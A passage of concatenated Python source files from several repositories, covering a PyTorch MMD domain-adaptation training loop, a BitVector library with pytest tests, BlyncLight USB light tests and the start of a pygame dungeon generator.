def train_mmd(model, config, writer, val_loader, device, best_model_path, fold_num, splits):
source_loader, target_loader = get_data_loaders(splits, config)
model.to(device)
if config.weights is not None:
pretrained_path = f"{config.weights}/fold_{fold_num}"
pretrained_weights = torch.load(f"{pretrained_path}/model.pt")["state_dict"]
model.load_state_dict(pretrained_weights)
linear_time = True # whether to compute MMD in linear time or quadratic
mkmmd_loss = MultipleKernelMaximumMeanDiscrepancy(
kernels=[GaussianKernel(alpha=2 ** k) for k in range(-3, 2)],
linear=linear_time
)
if config.use_default_optim:
base_lr = 1.0
classifier_params = [
{"params": model.spatial_encoder.parameters(), "lr": 0.1 * base_lr},
{"params": model.temporal_encoder.parameters(), "lr": 0.1 * base_lr},
{"params": model.decoder.parameters(), "lr": 1.0 * base_lr},
]
# lr_gamma = 0.0003
lr_gamma = 0.001
lr_decay = 0.75
optimizer = SGD(
classifier_params,
config.lr,
momentum=0.9,
weight_decay=config.weight_decay,
nesterov=True,
)
lr_scheduler = LambdaLR(
optimizer, lambda x: config.lr * (1.0 + lr_gamma * float(x)) ** (-lr_decay)
)
else:
optimizer = torch.optim.Adam(
model.parameters(),
lr=config.lr,
weight_decay=config.weight_decay,
)
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
optimizer, T_max=config.epochs * config.steps_per_epoch, eta_min=0
)
## train
best_f1 = 0.0
criterion = nn.CrossEntropyLoss()
source_iter, target_iter = iter(cycle(source_loader)), iter(cycle(target_loader))
global_step = 0
for epoch in range(config.epochs):
progress_bar = tqdm(range(config.steps_per_epoch), desc=f'MMD Epoch {epoch + 1}/{config.epochs}')
losses = AverageMeter()
class_accs = AverageMeter()
model.train()
mkmmd_loss.train()
for _ in progress_bar:
x_s, x_t = next(source_iter), next(target_iter)
labels_s = x_s["label"].cuda()
x = cat_samples([x_s, x_t])
y, f = model(*to_cuda(x, device), return_feats=True)
y_s, _ = y.chunk(2, dim=0)
f_s, f_t = f.chunk(2, dim=0)
cls_loss = criterion(y_s, labels_s)
transfer_loss = mkmmd_loss(f_s, f_t)
loss = cls_loss + transfer_loss * config.trade_off
optimizer.zero_grad()
loss.backward()
optimizer.step()
lr_scheduler.step()
losses.update(loss.item(), config.batch_size)
class_accs.update(accuracy(y_s, labels_s), config.batch_size)
progress_bar.set_postfix(
loss=f"{losses.avg:.3f}",
class_acc=f"{class_accs.avg:.2f}",
)
if global_step % config.log_step == 0:
writer.add_scalar("train/loss", losses.val, global_step)
writer.add_scalar("train/accuracy", class_accs.val, global_step)
writer.add_scalar(
"train/lr", optimizer.param_groups[0]["lr"], global_step
)
global_step += 1
progress_bar.close()
model.eval()
best_f1 = validation(best_f1, best_model_path, config, criterion, device, epoch, model, val_loader, writer)
# save final model and use for evaluation
torch.save({'state_dict': model.state_dict()}, best_model_path)
def get_data_loaders(splits, config):
def create_data_loader(dataset):
return torch.utils.data.DataLoader(dataset,
num_workers=config.num_workers, pin_memory=True,
batch_size=config.batch_size, shuffle=True, drop_last=True)
train_transform = transforms.Compose([
RandomSamplePixels(config.num_pixels),
RandomSampleTimeSteps(config.seq_length),
RandomTemporalShift(max_shift=config.max_shift_aug, p=config.shift_aug_p) if config.with_shift_aug else Identity(),
Normalize(),
ToTensor(),
])
source_dataset = PixelSetData(config.data_root, config.source, config.classes, train_transform, indices=splits[config.source]['train'])
source_loader = create_data_loader(source_dataset)
target_dataset = PixelSetData(config.data_root, config.target, config.classes, train_transform, indices=splits[config.target]['train'])
target_loader = create_data_loader(target_dataset)
print(f'size of source dataset: {len(source_dataset)} ({len(source_loader)} batches)')
print(f'size of target dataset: {len(target_dataset)} ({len(target_loader)} batches)')
return source_loader, target_loader
```
#### File: timematch/utils/focal_loss.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class FocalLoss(nn.Module):
def __init__(self, gamma=0, size_average=True):
super(FocalLoss, self).__init__()
self.gamma = gamma
self.size_average = size_average
def forward(self, input, target):
# input shape (B, C), target shape (B,)
target = target.view(-1,1)
logpt = F.log_softmax(input, dim=1)
logpt = logpt.gather(1, target)
logpt = logpt.view(-1)
pt = logpt.exp()
loss = -1 * (1-pt)**self.gamma * logpt
if self.size_average: return loss.mean()
else: return loss.sum()
``` |
{
"source": "JnyJny/bitvector",
"score": 4
} |
#### File: bitvector/bitvector/bitvector.py
```python
import functools
import operator
from typing import cast, Union
@functools.total_ordering
class BitVector:
"""A Bit Vector is a list of bits in packed (integer)
format that can be accessed by indexing into the vector
or using a slice (via conventional square brackets
notation).
"""
@classmethod
def zeros(cls, size: int = 128):
"""Create a BitVector initialized with zeros.
:param size: int
"""
return cls(size=size)
@classmethod
def ones(cls, size: int = 128):
"""Create a BitVector initialized with ones.
:param size: int
"""
bv = cls()
bv.set()
return bv
def __init__(self, value: int = 0, size: int = 128):
"""Initialize a BitVector with integer value and size in bits.
:param value: int
:param size: int
Raises:
- ValueError if size <= 0
"""
if size <= 0:
raise ValueError("Size must greater than zero.")
self.MAX = (1 << size) - 1
self.value = value
@property
def value(self) -> int:
"""The integer value of this BitVector."""
return getattr(self, "_value", 0)
@value.setter
def value(self, new_value: int) -> None:
self._value = int(new_value) & self.MAX
def clear(self):
"""Clears all bits in the vector to zero."""
self._value = 0
def set(self):
"""Sets all bits in the vector to one."""
self._value = self.MAX
def _getb(self, offset: int) -> int:
"""Retrieves the bit value at offset."""
if offset > len(self) - 1:
raise IndexError(offset)
return (self.value >> offset) & 0x1
def _setb(self, offset: int) -> None:
"""Sets the bit value at offset."""
if offset > (len(self) - 1):
raise IndexError(offset)
self.value |= (1 << offset) & self.MAX
def _clrb(self, offset: int) -> None:
"""Clears the bit value at offset."""
self.value &= ~(1 << offset)
def _setval(self, offset: int, value: int):
if value:
self._setb(offset)
else:
self._clrb(offset)
def toggle(self, offset: int) -> int:
"""Toggle the bit at `offset` in the vector and return the previous value.
:param offset: int
:return: int
"""
prev = self._getb(offset)
self.value ^= (1 << offset) & self.MAX
return prev
def __repr__(self) -> str:
return f"{self.__class__.__name__}(value={self!s}, size={len(self)})"
def __str__(self) -> str:
nibbles = (len(self) // 4) + (1 if (len(self) % 4) else 0)
return "0x" + hex(self.value)[2:].zfill(nibbles)
def __len__(self) -> int:
"""Length of the vector in bits."""
try:
return self._len
except AttributeError:
pass
self._len: int = self.MAX.bit_length()
return self._len
def __getitem__(self, key: Union[int, slice]) -> int:
"""Given a key, retrieve a bit or bitfield."""
if isinstance(key, int):
offset: int = cast(int, key)
if offset < 0:
offset += len(self)
return self._getb(offset)
if isinstance(key, slice):
rng: slice = cast(slice, key)
value = 0
for n, b in enumerate(range(*rng.indices(len(self)))):
v = self._getb(b)
if v:
value += 1 << n
return value
raise ValueError(f"Unknown key type: {type(key)}")
def __setitem__(self, key: Union[int, slice], value: Union[int, bool]) -> None:
"""Given a key, set a bit or bitfield to the supplied value.
If value is True or False and the key is a slice describing a
bit field, each bit in the field takes on the value. Otherwise,
the value is left shifted and the lsb is added to the next offset
in the bit field.
> b[:8] = True # results in bit0:bit7 == 0b11111111
> b[:8] = 0x1 # results in bit0:bit7 == 0b00000001
The difference is subtle and perhaps should not be considered a feature.
Supports negative indexing.
"""
if isinstance(key, int):
offset = int(key)
if offset < 0:
offset += len(self)
self._setval(offset, value)
return
try:
if value is True or value is False:
for b in range(*key.indices(len(self))):
self._setval(b, value)
return
for n, b in enumerate(range(*key.indices(len(self)))):
self._setval(b, (value >> n) & 0x1)
except AttributeError:
raise ValueError("Expected int or slice key") from None
def __binary_op(self, other, func, return_obj: bool = False, reverse: bool = False):
"""Calls the supplied function `func` with self and other.
If the user sets return_obj to True, a new BitVector initialized with the
results of `func` is returned. Otherwise the return type is assumed to be
`int`.
:param other: Union[int, BitVector]
:param func: callable from operator
:param return_obj: bool
:return: Union[int, bool, BitVector]
"""
try:
retval = func(self.value, other.value)
if return_obj:
size = len(min(self, other, key=len))
retval = self.__class__(retval, size=size)
return retval
except AttributeError:
pass
if reverse:
return func(other, self.value)
retval = func(self.value, other)
if return_obj:
retval = self.__class__(retval, size=len(self))
return retval
def __unary_op(self, func, return_obj: bool = False):
"""Calls the supplied function `func` with self and returns the result.
If return_obj is True, the return value is a BitVector initialized from
the results of `func`.
:param func: callable from operator
:param return_obj: bool
:return: Union[int, BitVector]
"""
retval = func(self.value) & self.MAX
if return_obj:
retval = self.__class__(retval, size=len(self))
return retval
def __inplace_op(self, other, func) -> object:
"""Calls the supplied binary function `func` with self and other
and updates self with the results.
:param other: Union[int, BitVector]
:param func: Callable from operator
:return: self
"""
try:
self.value = func(self.value, other.value)
except AttributeError:
self.value = func(self.value, other)
return self
@property
def bin(self) -> str:
"""Binary string representation of BitVector."""
return f"0b{bin(self.value)[2:].zfill(len(self))}"
@property
def hex(self) -> str:
"""Hexadecimal string representation of BitVector."""
return hex(self.value)
@property
def bytes(self) -> bytes:
"""Byte array representation of BitVector."""
n = len(self) // 8 + (1 if len(self) % 8 else 0)
return self.value.to_bytes(n, "big")
def __bool__(self) -> bool:
"""Returns False if zero else True."""
return bool(self.value)
def __eq__(self, other) -> bool:
"""Tests equality between BitVector and other.
:param other: Union[BitVector, int]
:return: bool
"""
return self.__binary_op(other, operator.eq)
def __gt__(self, other) -> bool:
"""True if BitVector is greater than other.
:param other: Union[BitVector, int]
:return: bool
"""
return self.__binary_op(other, operator.gt)
def __add__(self, other):
"""Add BitVector to other and return a BitVector initialized with the sum.
:param other: Union[BitVector|int]
:return: BitVector
"""
return self.__binary_op(other, operator.add, return_obj=True)
def __radd__(self, other) -> int:
"""Add BitVector to other, returning integer value.
:param other: int
:return: int
"""
return self.__binary_op(other, operator.add, reverse=True)
def __iadd__(self, other):
"""Add `other` to self in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.add)
def __sub__(self, other):
"""Subtract other from self and return a BitVector intialized with the difference.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__binary_op(other, operator.sub, return_obj=True)
def __rsub__(self, other):
"""Subtract this BitVector from an int and return the integer difference.
:param other: int
:return: int
"""
return self.__binary_op(other, operator.sub, reverse=True)
def __isub__(self, other):
"""Subtract other from this BitVector in-place.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__inplace_op(other, operator.sub)
def __mul__(self, other):
"""Multiply BitVector with other and return a BitVector initialized with the product.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__binary_op(other, operator.mul, return_obj=True)
def __rmul__(self, other):
"""Multiply other with the integral value of this BitVector and return an the product.
:param other: Union[BitVector, int]
:return: int
"""
return self.__binary_op(other, operator.mul, reverse=True)
def __imul__(self, other):
"""Multiply BitVector with other and update in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.mul)
def __truediv__(self, other):
"""Divide BitVector with other and return a BitVector initialized with the quotient.
:param other: Union[BitVector, int, float]
:param: BitVector
"""
return self.__binary_op(other, operator.truediv, return_obj=True)
def __rtruediv__(self, other):
"""Divide other with BitVector and return a float quotient.
:param other: Union[BitVector, int, float]
:return: float
"""
return self.__binary_op(other, operator.truediv, reverse=True)
def __itruediv__(self, other):
"""Divide BitVector by other and update in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.truediv)
def __floordiv__(self, other):
"""Divide BitVector with other and return the a BitVector initialized with the rounded quotient.
:param other: Union[BitVector, int, float]
:return: BitVector
"""
return self.__binary_op(other, operator.floordiv, return_obj=True)
def __rfloordiv__(self, other):
"""Divide other by BitVector and return a float quotient.
:param other: Union[int, float]
:return: float
"""
return self.__binary_op(other, operator.floordiv, reverse=True)
def __ifloordiv__(self, other):
"""Divide BitVector by other and update in-place.
:param other: Union[BitVector, int, float]
:return: self
"""
return self.__inplace_op(other, operator.floordiv)
def __and__(self, other):
"""Performs a bitwise AND of BitVector with other and returns a BitVector initialized with the result.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__binary_op(other, operator.and_, return_obj=True)
def __rand__(self, other):
"""Performs a bitwise AND of other with BitVector and returns an integer result.
:param other: Union[BitVector, int]
:return: int
"""
return self.__binary_op(other, operator.and_, reverse=True)
def __iand__(self, other):
"""Performs a bitwise AND of other with BitVector in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.and_)
def __or__(self, other):
"""Performs a bitwise OR of BitVector with other and returns a BitVector initialized with the result.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__binary_op(other, operator.or_, return_obj=True)
def __ror__(self, other):
"""Performs a bitwise OR of other with BitVector and returns the integer result.
:param other: Union[BitVector, int]
:return: int
"""
return self.__binary_op(other, operator.or_)
def __ior__(self, other):
"""Performs a bitwise OR of other with BitVector in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.or_)
def __xor__(self, other):
"""Performs a bitwise XOR of BitVector with other and returns a BitVector initialized with the result.
:param other: Union[BitVector, int]
"""
return self.__binary_op(other, operator.xor, return_obj=True)
def __rxor__(self, other):
"""Performs a bitwise XOR of other with BitVector and returns the integer result.
:param other: Union[BitVector, int]
:return: int
"""
return self.__binary_op(other, operator.xor)
def __ixor__(self, other):
"""Performs a bitwise XOR of other with BitVector in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.xor)
def __invert__(self):
"""Inverts BitVector and returns a new BitVector with the result.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__unary_op(operator.invert, return_obj=True)
def __neg__(self):
"""Inverts BitVector and returns a new BitVector with the result.
>>> x = -BitVector(0, size=16)
>>> x.hex
0xfffff
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__unary_op(operator.invert, return_obj=True)
def __pos__(self):
"""Returns a copy of this BitVector.
:param other: Union[BitVector, int]
"""
return self.__unary_op(operator.pos, return_obj=True)
def __lshift__(self, other):
"""Performs a bitwise left shift of BitVector by other positions and returns
a BitVector initialized with the results.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__binary_op(other, operator.lshift, return_obj=True)
def __ilshift__(self, other):
"""Shifts the contents of BitVector left by other positions in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.lshift)
def __rshift__(self, other):
"""Performs a bitwise right shift of BitVector by other positions and returns
a BitVector initialized with the results.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__binary_op(other, operator.rshift, return_obj=True)
def __irshift__(self, other):
"""Shifts the contents of BitVector right by other positions in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.rshift)
```
#### File: bitvector/tests/test_bitfield.py
```python
import pytest
from bitvector import BitVector, BitField, ReadOnlyBitField
from itertools import combinations
def test_bitfield_create_no_args():
with pytest.raises(TypeError):
BitField()
@pytest.mark.parametrize("offset", list(range(0, 128)))
def test_bitfield_create_with_offset(offset: int):
test = BitField(offset)
assert isinstance(test, BitField)
assert isinstance(test.field, slice)
assert (offset, offset + 1, 1) == test.field.indices(128)
@pytest.mark.parametrize("offset,width", list(combinations(range(1, 16), 2)))
def test_bitfield_create_with_offset_and_width(offset: int, width: int):
test = BitField(offset, width)
assert (offset, min(16, offset + width), 1) == test.field.indices(16)
def test_bitfield_in_bitvector_subclass_get_values(SixteenBitClass: type):
test = SixteenBitClass(0xABCD)
assert test == 0xABCD
assert test.byte0 == 0xCD
assert test.byte1 == 0xAB
# 0xD
assert test.bit0 == 1
assert test.bit1 == 0
assert test.bit2 == 1
assert test.bit3 == 1
# 0xC
assert test.bit4 == 0
assert test.bit5 == 0
assert test.bit6 == 1
assert test.bit7 == 1
# 0xB
assert test.bit8 == 1
assert test.bit9 == 1
assert test.bitA == 0
assert test.bitB == 1
# 0xA
assert test.bitC == 0
assert test.bitD == 1
assert test.bitE == 0
assert test.bitF == 1
def test_bitfield_in_bitvector_subclass_get_values(SixteenBitClass: type):
test = SixteenBitClass(0x0000)
assert test == 0
test.byte0 = 0x55
test.byte1 = 0xAA
assert test.byte0 == 0x55
assert test.byte1 == 0xAA
# 0x5
assert test.bit0 == 1
assert test.bit1 == 0
assert test.bit2 == 1
assert test.bit3 == 0
# 0x5
assert test.bit4 == 1
assert test.bit5 == 0
assert test.bit6 == 1
assert test.bit7 == 0
# 0xA
assert test.bit8 == 0
assert test.bit9 == 1
assert test.bitA == 0
assert test.bitB == 1
# 0xA
assert test.bitC == 0
assert test.bitD == 1
assert test.bitE == 0
assert test.bitF == 1
def test_readonly_bitfield_in_bitvector_subclass():
class TestClass(BitVector):
def __init__(self):
super().__init__(value=0xDEADBEEF, size=32)
dead = BitField(16, 16)
beef = ReadOnlyBitField(0, 16)
test = TestClass()
assert test.dead == 0xDEAD
assert test.beef == 0xBEEF
test.dead = 0xcafe
assert test.dead == 0xcafe
with pytest.raises(TypeError):
test.beef = 0x0bad
assert test.beef == 0xbeef
```
#### File: bitvector/tests/test_bitvector_add.py
```python
import pytest
from bitvector import BitVector
from itertools import permutations
@pytest.mark.parametrize("value", [1 << p for p in range(0, 128)])
def test_bitvector_add_scalar(value: int, BV_0: BitVector, BV_1: BitVector):
result = BV_0 + value
assert isinstance(result, BitVector)
assert result == value
result = BV_1 + value
assert isinstance(result, BitVector)
assert result == value + 1
@pytest.mark.parametrize("value", [1 << p for p in range(0, 128)])
def test_bitvector_radd_scalar(value: int, BV_0: BitVector, BV_1: BitVector):
result = value + BV_0
assert isinstance(result, int)
assert result == value
result = value + BV_1
assert isinstance(result, int)
assert result == value + 1
@pytest.mark.parametrize("value", [1 << p for p in range(0, 128)])
def test_bitvector_add_bitvector(value: int, BV_0: BitVector, BV_1: BitVector):
expected = BitVector(value)
result = BV_0 + expected
assert isinstance(result, BitVector)
assert result == expected and result is not expected
result = BV_1 + expected
assert isinstance(result, BitVector)
assert result == expected.value + 1
@pytest.mark.parametrize("value", [1 << p for p in range(0, 128)])
def test_bitvector_iadd_scalar(value: int, BV_0: BitVector, BV_1: BitVector):
BV_0 += value
assert BV_0 == value
BV_1 += value
assert BV_1 == value + 1
@pytest.mark.parametrize("value", [1 << p for p in range(0, 128)])
def test_bitvector_iadd_bitvector(value: int, BV_0: BitVector, BV_1: BitVector):
bv = BitVector(value)
BV_0 += bv
assert BV_0 == value
BV_1 += bv
assert BV_1 == value + 1
@pytest.mark.parametrize("size_a, size_b", list(permutations(range(1, 16), 2)))
def test_bitvector_add_bitvector_mismatched_sizes(size_a, size_b):
a = BitVector(1, size=size_a)
b = BitVector(1, size=size_b)
c = a + b
assert isinstance(c, BitVector)
assert len(c) == len(min(a, b, key=len))
assert c == (2 & c.MAX)
``` |
{
"source": "JnyJny/blynclight",
"score": 5
} |
#### File: blynclight/effects/gradient.py
```python
from typing import List, Tuple
def Gradient(
start: int,
stop: int,
step: int,
red=True,
green=False,
blue=False,
reverse: bool = False,
) -> List[Tuple[int, int, int]]:
"""Returns a list of RBG tuples that describe a color gradient.
The gradient starts at `start` and finishes with `stop` with `step` sized
intervals between color tuples. If the user calls with reverse=True, the
list is reversed and appended to itself to create a ramp up/ramp down
effect.
:param start: integer
:param stop: integer
:param step: integer
:param red: bool
:param green: bool
:param blue: bool
:param reverse: bool
:return: List[Tuple[int, int, int]]
"""
colors = []
for i in range(start, stop, step):
colors.append((i if red else 0, i if blue else 0, i if green else 0))
if reverse:
colors += reversed(colors)
return colors
```
#### File: blynclight/tests/test_blynclight.py
```python
import pytest
from dataclasses import dataclass
from blynclight import (
BlyncLight,
BlyncLightNotFound,
BlyncLightUnknownDevice,
BlyncLightInUse,
)
from blynclight.constants import (
EMBRAVA_VENDOR_IDS,
END_OF_COMMAND,
COMMAND_LENGTH,
PAD_VALUE,
)
@dataclass
class FieldToTest:
"""Encapsulates field name, a given value to set and the expected
value when the field is read.
"""
name: str
given: int
expected: int
@pytest.fixture(params=[])
def reset_field(request):
"""This fixture presents a list of FieldToTest objects for the
purpose of testing the BlyncLight.reset() method. The fields
are set to the given value and after reset should match the
expected value.
"""
return request.param
@pytest.fixture()
def number_of_lights():
"""Number of physical Embrava BlyncLight devices detected.
"""
return len(BlyncLight.available_lights())
def test_blynclight_available_lights():
"""Checks that the BlyncLight.available_lights() class method returns
a list of dictionaries, one dictionary for each BlyncLight device
discovered.
"""
info = BlyncLight.available_lights()
assert isinstance(info, list)
for entry in info:
assert isinstance(entry, dict)
assert entry.get("vendor_id", None)
assert entry.get("product_id", None)
def test_blynclight_get_light(number_of_lights):
"""Test the BlyncLight.get_light() class method to ensure that it
returns a BlyncLight object if the specified light is available.
The test also makes sure BlyncLightNotFound is raised when a
nonexistent light is requested.
:param number_of_lights: integer fixture
"""
assert number_of_lights >= 0
if number_of_lights > 0:
assert isinstance(BlyncLight.get_light(), BlyncLight)
assert isinstance(BlyncLight.get_light(0), BlyncLight)
with pytest.raises(BlyncLightNotFound):
BlyncLight.get_light(number_of_lights)
return
# We get here if no lights are currently available
assert number_of_lights == 0
with pytest.raises(BlyncLightNotFound):
BlyncLight.get_light()
BlyncLight.get_light(0)
def test_blynclight_unknown_device():
"""Tests the BlyncLight.__init__ method to make sure that
BlyncLightUnknownDevice is raised if we feed it a bogus vendor
identifier.
"""
bogus = 0xFFFF
assert bogus not in EMBRAVA_VENDOR_IDS
with pytest.raises(BlyncLightUnknownDevice):
BlyncLight(bogus, bogus)
def test_blynclight_vendor(Light):
""":param light: BlyncLight fixture
Double check that the BlycnLight's vendor_id property is
in the list of the known Embrava vendor identifiers. This
check occurs in the BlyncLight __init__ so maybe not
needed here.
"""
assert Light.vendor_id in EMBRAVA_VENDOR_IDS
def test_blynclight_product_id(Light):
""":param Light: BlyncLight fixture
Double check that the BlyncLight's product_id property is
non-zero (it's a hidapi wildcard value).
"""
assert Light.product_id != 0
def test_blynclight_device(Light):
""":param Light: BlyncLight fixture
Check to make sure the BlyncLight's device property is not None.
"""
assert Light.device
def test_blynclight_length(Light):
""":param Light: BlyncLight fixture
Check to make sure the BlyncLight's length is COMMAND_LENGTH.
"""
assert len(Light) == COMMAND_LENGTH * 8
assert len(Light.bytes) == COMMAND_LENGTH
@pytest.mark.parametrize(
"field",
[
FieldToTest("immediate", 0, 0),
FieldToTest("immediate", 1, 1),
FieldToTest("red", 0xAA, 0xAA),
FieldToTest("blue", 0xBB, 0xBB),
FieldToTest("green", 0xCC, 0xCC),
FieldToTest("off", 0, 0),
FieldToTest("off", 1, 1),
FieldToTest("on", 0, 0),
FieldToTest("on", 1, 1),
FieldToTest("dim", 1, 1),
FieldToTest("dim", 0, 0),
FieldToTest("flash", 1, 1),
FieldToTest("flash", 0, 0),
FieldToTest("speed", 1, 1),
FieldToTest("speed", 2, 2),
FieldToTest("speed", 3, 3),
FieldToTest("music", 1, 1), # XXX not sure how many music values there are
FieldToTest("music", 0, 0),
FieldToTest("play", 1, 1),
FieldToTest("play", 0, 0),
FieldToTest("repeat", 1, 1),
FieldToTest("repeat", 0, 0),
FieldToTest("volume", 1, 1),
FieldToTest("volume", 0, 0),
FieldToTest("mute", 1, 1),
FieldToTest("mute", 0, 0),
],
)
def test_bitfield(field, Light):
""":param Light: BlyncLight fixture
:param field: FieldToTest fixture
Tests a BlyncLight field by setting the light's
field to value and then comparing the attribute's
value to the expected value.
"""
setattr(Light, field.name, field.given)
value = getattr(Light, field.name)
assert value == field.expected
def test_color_property_tuple(Light):
""":param Light: BlyncLight fixture
The BlyncLight color property is a synthetic property that
suspends device updates while the red, blue and green fields
are updated. Once the red, blue, and green fields are set
in-memory, updates to the hardware are re-enabled.
This test sets the color property using a three-tuple of 8-bit
integers, e.g.:
> light.color = (0xaa, 0xbb, 0xcc)
The color property getter is compared to the three-tuple and
the individual color fields are checked to make sure they
were updated with expected values.
"""
Light.color = (0xAA, 0xBB, 0xCC)
assert Light.color == (0xAA, 0xBB, 0xCC)
assert Light.red == 0xAA
assert Light.blue == 0xBB
assert Light.green == 0xCC
def test_color_property_hex(Light):
""":param light: BlyncLight fixture
The BlyncLight color property is a synthetic property that
suspends device updates while the red, blue and green fields
are updating. Once the red, blue, and green fields are set
in-memory, updates to the hardware are re-enabled.
This test sets the color property using a 24-bit integer:
> Light.color = 0x112233
The color property getter is compared to the expected three-tuple
and the individual color fields are checked to make sure they were
updated with expected values.
"""
Light.color = 0x112233
assert Light.color == (0x11, 0x22, 0x33)
assert Light.red == 0x11
assert Light.blue == 0x22
assert Light.green == 0x33
@pytest.mark.parametrize("starting_immediate", [True, False])
def test_updates_paused_context_manager(starting_immediate: bool, Light):
""":param light: BlyncLight fixture
By default, a BlyncLight object writes it's in-memory
representation of the command word to the device whenever
a field is written. The updates_paused() method is a
context manager that will suspend updates to the device
for the duration of the context manager's execution.
This method sets the immediate field to a known value,
starts a context manager, checks that immediate is zero
and then checks that immediate is restored to it's
original value when the context manager exits.
"""
Light.immediate = starting_immediate
assert Light.immediate == starting_immediate
with Light.updates_paused():
assert Light.immediate == False
assert Light.immediate == starting_immediate
def test_on_property(Light):
""":param light: BlyncLight fixture
The BlyncLight 'on' property is a synthetic negative logic accessor
for the 'off' field in the command word. It made more sense to me
to turn a light on with:
light.on = 1
instead of:
light.off = 0
Those statements are equivalent, the test makes sure that manipulating
'on' sets 'off' appropriately and vice-versa
"""
for value in [False, True]:
Light.off = value
assert Light.off == value
assert Light.on == (not value)
Light.on = value
assert Light.on == value
assert Light.off == (not value)
def test_bright_property(Light):
""":param light: Blynclight fixture
The BlyncLight 'bright' property is a synthetic opposite logic
accessor for the 'dim' field in the command word. It made more sense
to me to make the light bright with:
light.bright = 1
instead of
light.dim = 0
Those statements are equivalent, the test makes sure that manipulating
'bright' sets 'dim' appropriately and vice-versa.
"""
for value in [False, True]:
Light.dim = value
assert Light.dim == value
assert Light.bright == (not value)
Light.bright = value
assert Light.bright == value
assert Light.dim == (not value)
def test_open_same_device(number_of_lights):
""":param number_of_lights: integer fixture
Two BlyncLight objects cannot open the same device, so here we
test that BlyncLightInUse is raised when that is attempted. This
only works if there are physical lights to test against, which is
controlled with the number_of_lights fixture.
"""
if number_of_lights <= 0:
return
a_light = BlyncLight.get_light()
assert isinstance(a_light, BlyncLight)
with pytest.raises(BlyncLightInUse):
b_light = BlyncLight.get_light()
del a_light
c_light = BlyncLight.get_light()
assert isinstance(c_light, BlyncLight)
@pytest.mark.parametrize(
"field",
[
FieldToTest("red", 0xFF, 0),
FieldToTest("blue", 0xFF, 0),
FieldToTest("green", 0xFF, 0),
FieldToTest("off", 0, 1),
FieldToTest("dim", 1, 0),
FieldToTest("flash", 1, 0),
FieldToTest("speed", 1, 1),
FieldToTest("music", 1, 0),
FieldToTest("play", 1, 0),
FieldToTest("repeat", 1, 0),
FieldToTest("volume", 1, 0),
FieldToTest("mute", 1, 1),
],
)
def test_reseting_light(field, Light):
""":param light: BlyncLight fixture
:param reset_field: FieldToTest fixture
Dirties up the light and then resets() it to a known state.
Each time a field in the light is altered, reset() is called and
the reset field value compared to the expected value.
"""
setattr(Light, field.name, field.given)
Light.reset(flush=False)
value = getattr(Light, field.name)
assert value == field.expected
@pytest.mark.parametrize(
"propname",
[
"red",
"blue",
"green",
"off",
"dim",
"flash",
"speed",
"repeat",
"play",
"music",
"mute",
"volume",
],
)
def test_status_property(propname, Light):
""":param light: BlyncLight fixture
Confirms that the BlyncLight property 'status' is a
dictionary, that keys of the dictionary are those
enumerated by the commands property and that the
values of the commands are integers.
"""
status = Light.status
assert isinstance(status, dict)
assert propname in status
``` |
{
"source": "JnyJny/DungeonGenerator",
"score": 3
} |
#### File: JnyJny/DungeonGenerator/Dungeon.py
```python
import math
import random
import pygame
import pygame.color
## http://gamasutra.com/blogs/AAdonaac/20150903/252889/Procedural_Dungeon_Generation_Algorithm.php
## utility functions
def roundm(n,m):
rnd = lambda x: math.floor((x+m-1)/m)*m
try:
return [x for x in rnd(n)]
except TypeError:
return rnd(n)
def slope(p0,p1):
try:
m = (p1[1] - p0[1]) / (p1[0] - p0[0])
except ZeroDivisionError:
m = 0
return m
def collide_rooms(left,right):
'''
Collide rooms, allow them to share edges
'''
if left == right: # ignore self collisions
return False
return right.rect.inflate(-2,-2).colliderect(left.rect.inflate(-2,-2))
def collide_and_scatter_rooms(left,right):
'''
If the rooms collide, apply a velocity to one of them.
'''
if collide_rooms(left,right):
right.repulse(left)
return True
right.velocity *= 0
return False
def gridToScreen(count,spacing):
'''
Convert grid coordinates (counts) to screen coordinates
'''
return ((spacing+1)*count)+1
def screenToGrid(coord,spacing):
'''
Convert screen coordinates to grid coordinates
'''
return roundm(coord/(spacing+1),spacing)
def collide_with_voids(left,right):
'''
'''
return right.isVoid and collide_rooms(left,right)
def snap_rect_to_grid(rect,gridSpacing):
'''
'''
grid = gridSpacing+1
rect.x = roundm(rect.x,grid)
rect.y = roundm(rect.y,grid)
rect.w = roundm(rect.w,grid)
rect.h = roundm(rect.h,grid)
## classes
class Room(pygame.sprite.Sprite):
_id = 0
@classmethod
def fromRect(cls,rect,gridSpacing):
'''
Create a new room using rect for it's bounds.
'''
r = Room(gridSpacing=gridSpacing)
r.rect = rect
return r
@classmethod
def nextID(cls):
'''
Return the next unique room identifer.
'''
i = cls._id
cls._id += 1
def __init__(self,x=0,y=0,width=1,height=1,gridSpacing=1):
'''
x, y : dungeon surface coords
width, height : in grid units
gridSpacing : interior diameter of grid unit
'''
super(Room,self).__init__()
self.id = Room.nextID()
self.width = width
self.height = height
self.gridSpacing = gridSpacing
self.velocity = pygame.math.Vector2(0,0)
self.image = pygame.Surface((gridToScreen(width,gridSpacing),
gridToScreen(height,gridSpacing)))
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
self.neighbors = []
self.snapToGrid()
self.render()
def __repr__(self):
return 'Room(%d,%s,velocity=%s)' % (self.id,self.rect,self.velocity)
@property
def fgcolor(self):
return Dungeon.COLORS[self.layer][0]
@property
def bgcolor(self):
